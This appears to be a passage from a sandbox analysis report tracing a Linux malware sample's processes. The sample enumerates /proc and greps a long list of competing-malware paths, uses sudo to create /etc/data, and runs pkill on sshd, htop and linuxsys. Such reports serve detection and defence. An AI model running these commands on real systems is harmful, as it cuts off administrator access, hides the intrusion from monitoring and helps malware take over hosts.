  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1258
- /bin/ls
  ls -latrh /proc/key-users
  2⤵
  PID:1261
- /bin/grep
  grep exe
  2⤵
  PID:1262
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1265
- /bin/ls
  ls -latrh /proc/kmsg
  2⤵
  PID:1267
- /bin/grep
  grep exe
  2⤵
  PID:1268
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1271
- /bin/ls
  ls -latrh /proc/kpagecgroup
  2⤵
  PID:1274
- /bin/grep
  grep exe
  2⤵
  PID:1275
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1277
- /bin/ls
  ls -latrh /proc/kpagecount
  2⤵
  PID:1280
- /bin/grep
  grep exe
  2⤵
  PID:1281
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1284
- /bin/grep
  grep exe
  2⤵
  PID:1287
- /bin/ls
  ls -latrh /proc/kpageflags
  2⤵
  PID:1286
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1290
- /bin/ls
  ls -latrh /proc/loadavg
  2⤵
  PID:1293
- /bin/grep
  grep exe
  2⤵
  PID:1294
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1296
- /bin/grep
  grep exe
  2⤵
  PID:1300
- /bin/ls
  ls -latrh /proc/locks
  2⤵
  PID:1299
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1303
- /bin/ls
  ls -latrh /proc/meminfo
  2⤵
  PID:1305
- /bin/grep
  grep exe
  2⤵
  PID:1306
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1309
- /bin/grep
  grep exe
  2⤵
  PID:1313
- /bin/ls
  ls -latrh /proc/misc
  2⤵
  PID:1312
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1315
- /bin/grep
  grep exe
  2⤵
  PID:1318
- /bin/ls
  ls -latrh /proc/modules
  2⤵
  PID:1317
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1320
- /bin/grep
  grep exe
  2⤵
  PID:1323
- /bin/ls
  ls -latrh /proc/mounts
  2⤵
  PID:1322
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1325
- /bin/grep
  grep exe
  2⤵
  PID:1328
- /bin/ls
  ls -latrh /proc/net
  2⤵
  PID:1327
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1330
- /bin/grep
  grep exe
  2⤵
  PID:1333
- /bin/ls
  ls -latrh /proc/pagetypeinfo
  2⤵
  PID:1332
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1335
- /bin/grep
  grep exe
  2⤵
  PID:1338
- /bin/ls
  ls -latrh /proc/partitions
  2⤵
  PID:1337
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1340
- /bin/grep
  grep exe
  2⤵
  PID:1343
- /bin/ls
  ls -latrh /proc/sched_debug
  2⤵
  PID:1342
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1345
- /bin/grep
  grep exe
  2⤵
  PID:1348
- /bin/ls
  ls -latrh /proc/schedstat
  2⤵
  PID:1347
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1350
- /bin/grep
  grep exe
  2⤵
  PID:1353
- /bin/ls
  ls -latrh /proc/self
  2⤵
  PID:1352
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1355
- /bin/grep
  grep exe
  2⤵
  PID:1358
- /bin/ls
  ls -latrh /proc/slabinfo
  2⤵
  PID:1357
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1360
- /bin/grep
  grep exe
  2⤵
  PID:1363
- /bin/ls
  ls -latrh /proc/softirqs
  2⤵
  PID:1362
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1365
- /bin/grep
  grep exe
  2⤵
  PID:1368
- /bin/ls
  ls -latrh /proc/stat
  2⤵
  PID:1367
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1370
- /bin/grep
  grep exe
  2⤵
  PID:1373
- /bin/ls
  ls -latrh /proc/swaps
  2⤵
  PID:1372
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1375
- /bin/grep
  grep exe
  2⤵
  PID:1378
- /bin/ls
  ls -latrh /proc/sys
  2⤵
  PID:1377
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1380
- /bin/grep
  grep exe
  2⤵
  PID:1383
- /bin/ls
  ls -latrh /proc/sysrq-trigger
  2⤵
  PID:1382
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1385
- /bin/grep
  grep exe
  2⤵
  PID:1388
- /bin/ls
  ls -latrh /proc/sysvipc
  2⤵
  - System Network Configuration Discovery
  PID:1387
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1390
- /bin/grep
  grep exe
  2⤵
  PID:1393
- /bin/ls
  ls -latrh /proc/thread-self
  2⤵
  PID:1392
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1395
- /bin/grep
  grep exe
  2⤵
  PID:1398
- /bin/ls
  ls -latrh /proc/timer_list
  2⤵
  PID:1397
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1400
- /bin/grep
  grep exe
  2⤵
  PID:1403
- /bin/ls
  ls -latrh /proc/tty
  2⤵
  PID:1402
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1405
- /bin/grep
  grep exe
  2⤵
  PID:1408
- /bin/ls
  ls -latrh /proc/uptime
  2⤵
  PID:1407
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1410
- /bin/grep
  grep exe
  2⤵
  PID:1413
- /bin/ls
  ls -latrh /proc/version
  2⤵
  PID:1412
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1415
- /bin/grep
  grep exe
  2⤵
  PID:1418
- /bin/ls
  ls -latrh /proc/vmallocinfo
  2⤵
  PID:1417
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1420
- /bin/grep
  grep exe
  2⤵
  PID:1423
- /bin/ls
  ls -latrh /proc/vmstat
  2⤵
  PID:1422
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1425
- /bin/grep
  grep exe
  2⤵
  PID:1428
- /bin/ls
  ls -latrh /proc/zoneinfo
  2⤵
  PID:1427
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1430
- /usr/bin/id
  id -u
  2⤵
  PID:1431
- /usr/bin/sudo
  sudo mkdir /etc/data
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1432
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:1435
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1tmO06-0000N9-VT
      4⤵
      Reads CPU attributes
      PID:1449
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:1438
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1tmO06-0000NC-Vo
      4⤵
      Reads CPU attributes
      PID:1448
- - /bin/mkdir
    mkdir /etc/data
    3⤵
    PID:1439
- /usr/bin/id
  id -u
  2⤵
  PID:1440
- /bin/uname
  uname -i
  2⤵
  - Attempts to change immutable files
  PID:1441
- /bin/uname
  uname -m
  2⤵
  PID:1442
- /bin/ls
  ls -la /etc/data
  2⤵
  PID:1444
- /bin/grep
  grep -e /dev
  2⤵
  PID:1445
- /bin/grep
  grep -v grep
  2⤵
  PID:1446
- /usr/bin/pkill
  pkill -f sshd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1447
- /usr/bin/pkill
  pkill -f htop
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1450
- /usr/bin/pkill
  pkill -f linuxsys
  2⤵
  - Reads CPU attributes
  PID:1452
